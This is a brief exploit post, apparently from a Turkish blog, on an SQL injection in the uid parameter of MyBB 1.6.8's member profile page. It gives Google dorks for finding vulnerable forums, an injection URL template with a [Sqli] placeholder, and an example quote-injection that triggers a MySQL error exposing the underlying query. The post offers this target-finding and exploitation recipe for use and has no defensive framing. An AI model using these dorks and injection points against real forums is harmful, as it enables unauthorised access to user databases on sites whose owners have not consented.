MyBB 1.6.8 Sql Injection Vulnerability
-====Dork====-
inurl:member.php?action=profile&uid=
inurl:action=profile&uid=27
-====Exploit====-
http://www.Site.com/forums/member.php?ac...ofile&uid=[Sqli]
-====Example====-
http://www.Site.com/forums/member.php?ac...ile&uid=9
http://www.Site.com/forums/member.php?ac...le&uid=9'
-====information====-
MyBB has experienced an internal SQL error and cannot continue.
SQL Error:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0'' at line 1
Query:
SELECT * FROM mybb_adv_ratings WHERE fuid='9'' AND uid='0' =))
0 yorum: